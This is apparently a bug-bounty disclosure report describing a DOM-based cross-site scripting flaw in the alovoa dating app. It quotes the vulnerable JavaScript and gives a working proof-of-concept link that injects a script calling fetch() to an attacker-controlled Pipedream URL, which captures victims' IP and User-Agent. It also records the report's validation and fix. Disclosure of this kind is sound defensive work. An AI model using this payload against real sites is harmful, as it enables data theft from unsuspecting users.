Cross-site Scripting (XSS) - DOM in alovoa/alovoa

Valid

Reported on

Jul 19th 2021

✍️ Description

It is possible to run JavaScript code in the webpage by DOM unsanitized properties. The function onChangeLocal sets the value of window.location.search directly from the URL, without previous checks.

🕵️‍♂️ Proof of Concept

// Vulnerable function in file fragments.html:139
<script>
function onChangeLocal(e) {
let val = e.options[e.selectedIndex].value;
console.log(val);
window.location.search = val;
}
</script>

A quick example can be done obtaining IP and User-Agent info from a victim: The attacker sets a webserver. For poc purposes, a Pipedream URL was used: https://en8ysa1cvfw0x29.m.pipedream.net

The attacker also sends the following link to the victim: https://alovoa.com/?lang=es"><script>fetch("https://en8ysa1cvfw0x29.m.pipedream.net")</script>

So the val will be set with the malicious payload.

When the victim opens the link, the attacker gets the IP and User-Agent.

Figure

💥 Impact

This could be useful for an attacker to make users execute a malicious link and then get personal information or do other malicious actions.

References

Ileana Barrionuevo modified the report
2 years ago
We have contacted a member of the alovoa team and are waiting to hear back 2 years ago
Nho Quy Dinh validated this vulnerability 2 years ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nho Quy Dinh marked this as fixed with commit 01ae69 2 years ago
Nho Quy Dinh has been awarded the fix bounty
This vulnerability will not receive a CVE
amammad
2 years ago

dear Ileana Barrionuevo , I don't like to find bug on repositories that already someone working on it, so if you let me I work on Alovoa, your friend, Amammad.

Ileana
2 years ago

Researcher

Hi Amammad, I don't have any problem :) Four eyes see better than two ones. :D

to join this conversation